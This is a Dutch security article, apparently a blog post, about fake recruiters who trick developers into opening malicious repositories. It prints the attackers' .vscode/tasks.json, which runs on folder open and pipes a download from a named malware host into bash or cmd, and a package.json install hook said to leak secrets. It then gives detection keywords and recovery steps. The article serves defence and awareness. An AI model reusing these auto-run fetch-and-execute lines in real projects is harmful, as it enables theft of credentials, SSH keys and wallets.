Security

Besmettelijk Interview: Hoe nep-recruiters ontwikkelaars hacken

Besmettelijk Interview (Contagious Interview): Hoe nep-recruiters ontwikkelaars hacken

Samenvatting: Een nieuwe golf van door de staat gesponsorde aanvallen overspoelt topontwikkelaars in crypto. Oplichters doen zich voor als recruiters of CTO's en dwingen kandidaten om kwaadaardige code te openen. Dit artikel analyseert de "Martin Erazo" zaak, de VS Code "tasks.json" inbraak en het noodzakelijke "Burn Protocol" om te overleven.

Disclaimer: Dit artikel rapporteert over cybersecurity-incidenten waarbij echte personen worden geïmiteerd. De namen "Martin Erazo" en "Ara Vartanian" verwijzen naar persona's die door aanvallers worden gebruikt. Wij geloven dat de echte personen met deze namen onschuldige slachtoffers zijn van identiteitsdiefstal en niet betrokken zijn bij kwaadaardige activiteiten.



1. Het Perfecte Slachtoffer: De "Martin Erazo" Persona

Het begint met een bericht dat alle juiste knoppen indrukt voor een Senior Dev:

  • Role: CTO / Lead Architect
  • Budget: $6M funding secured
  • Tech: Web3, AI, Decentralized Infra

Bij een recent bevestigde aanval nam een recruiter genaamd "Martin Erazo" contact op via LinkedIn. Het profiel gebruikte de naam en foto van een echte theaterregisseur, maar de werkgeschiedenis was nep en veranderde in 2025 plotseling naar "IT Project Management" - een klassiek teken van een gehackt of gekocht account.

De oplichterij gaat snel. Ze slaan de standaard HR-screening over en springen direct naar een "Technical Interview" met een topmanager - in dit geval een imitatie van de echte industrie-CTO Ara Vartanian (momenteel bij Limit Break).

Rode Vlag: De projectnamen verschuiven constant. De recruiter verkoopt "Betfin" (een GameFi-platform), maar het gestuurde deck is voor "SpaceXView" (een Metaverse-project). Deze mismatch is een aanwijzing dat oplichters assets recyclen tussen campagnes.

Social Engineering Recruiter vs Hacker

2. De Valstrik: "Kun je onze MVP-code reviewen?"

De nep-"CTO" beweert dat ze jouw deskundige ogen nodig hebben om hun MVP (Minimum Viable Product) code te reviewen. Ze sturen een GitHub Repo-link of een ZIP-bestand en oefenen druk uit om het tijdens het interview of direct erna te openen.

Dit is waar de hack plaatsvindt.

Ze maken misbruik van je bereidheid om te helpen en je ego. Je denkt dat je jaagt op bugs in een React-component. In werkelijkheid is de bug een "feature" die ontworpen is om je spaargeld te stelen.

3. De Technische Inbraak: Zero-Click Malware

Aanvallers gebruiken "zero-click" of "low-click" exploits die ontwikkelaarstools targeten. Ze hebben niet nodig dat je de app uitvoert; alleen dat je de map opent.

Het Wapen: .vscode/tasks.json

In dit specifieke geval bevatte de Repo een boobytrapped .vscode/tasks.json bestand. Dit bestand vertelt VS Code hoe het project gebouwd moet worden.

Kwaadaardige Code:

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}
  • "runOn": "folderOpen": Dit is de trekker. Zodra je de map opent in VS Code, wordt deze taak automatisch uitgevoerd.
  • Payload: Het gebruikt curl om een script te downloaden van vscodesettingtask.vercel.app - een bekende malware-host vermomd als een instellingen-API.
  • Resultaat: Het script draait in het geheugen en steelt onmiddellijk Chrome-wachtwoorden, sessiekoekjes en SSH-sleutels.

Plan B: package.json scripts

Als de VS Code hack mislukt, hebben ze npm-scripts:

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

Het uitvoeren van npm install of npm start activeert server/server.js - een lokaal C2 (Command and Control) script dat je Environment Variables (AWS keys, Wallet seeds) lekt naar de aanvaller.

4. Rode Vlaggen vs Groene Vlaggen

Hoe herken je het voordat het te laat is?

Als je een Dev bent, zouden "Private Repo's" of ZIP-bestanden een alarm van het hoogste niveau moeten activeren. Legitieme bedrijven gebruiken Public Repo's of standaard testplatforms.

Waarschuwing: Dit is niet de enige manier om Devs aan te vallen. Lees over de Collaborator Trap in Discord en hoe Supply Chain Attacks dependencies onveilig maken.

🚩 Rode Vlag (Rennen)✅ Groene Vlag (Veilig)
Code Eerst: Code sturen voor een baanaanbodStandaard Proces: Eerst interview, dan code
Gebroken Identiteit: Recruiter heeft irrelevant verleden (bijv. Artiest -> IT Manager)Geverifieerde Geschiedenis: LinkedIn carrièrepad is consistent
Mismatch: Projectnamen kloppen niet (Betfin vs SpaceXView)Consistentie: Naam, documentatie en website komen overeen
Urgentie: "CTO wacht", "open nu"Geduld: Ze respecteren je tijd en agenda
Persoonlijke E-mail: [email protected]Bedrijfs E-mail: [email protected] (met werkende MX records)

5. Security Protocol: Veilig Interviewen

Als je een Senior Dev bent, zul je opgejaagd worden. Je omgeving verharden is verplicht.

Protocol 1: "Burner" Omgeving

Gebruik NOOIT je hoofdwerkstation voor code tests.

  • Virtuele Machines: Gebruik VirtualBox of VMWare.
  • Cloud Dev Omgevingen: Gebruik GitHub Codespaces of Gitpod. Deze zijn van korte duur en geïsoleerd van je lokale walletbestanden.

Protocol 2: Forensische Audit

Voordat je onbekende code opent:

  1. Check .vscode/tasks.json: Zoek naar runOn: folderOpen.
  2. Check package.json: Zoek naar verdachte preinstall of postinstall scripts.
  3. Zoekwoord Zoeken: grep naar curl, wget, os.homedir(), .ssh, wallet.

Protocol 3: VS Code Hardening

Schakel wereldwijd "Workspace Trust" uit.

  • Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
  • Dit dwingt VS Code om toestemming te vragen voordat map-niveau taken worden uitgevoerd.

VS Code Hardening Shield

6. De Oplossing: "Burn Protocol"

Als je een kwaadaardige Repo hebt geopend (zoals die gestuurd door de "Martin Erazo" persona), ga er dan vanuit dat je gehackt bent. Een rollback is niet genoeg.

  1. Verbinding verbreken: Trek de ethernetkabel er direct uit.
  2. Wallet Verbranden: Je Private Keys zijn gelekt. Maak nieuwe wallets aan op een schoon apparaat (telefoon) en verplaats resterende fondsen. Gebruik de oude seed nooit meer.
  3. Sessies Doden: Log uit bij alle sessies op Google, GitHub, AWS. Trek actieve sessies in.
  4. SSH Sleutels Auditen: Check GitHub/GitLab instellingen. Aanvallers voegen vaak hun SSH-sleutels toe om backdoor-toegang te behouden. Verwijder wat je niet herkent.
  5. Nuke It: Wis de schijf en installeer het OS opnieuw. Dit is de enige manier om 100% zeker te zijn dat Rootkits weg zijn.

Conclusie

De "Contagious Interview" zwendel gebruikt je eigen expertise als wapen. Het richt zich op je verlangen om problemen op te lossen. Maar in Web3 is paranoia een professionele deugd. Verifieer elke identiteit, sandbox elke repo en vertrouw nooit een "recruiter" die haast heeft dat je code uitvoert.

Klaar om Je Kennis in de Praktijk te Brengen?

Begin vandaag met vertrouwen AI-aangedreven handel

Begin

Toegankelijkheid & Leeshulpmiddelen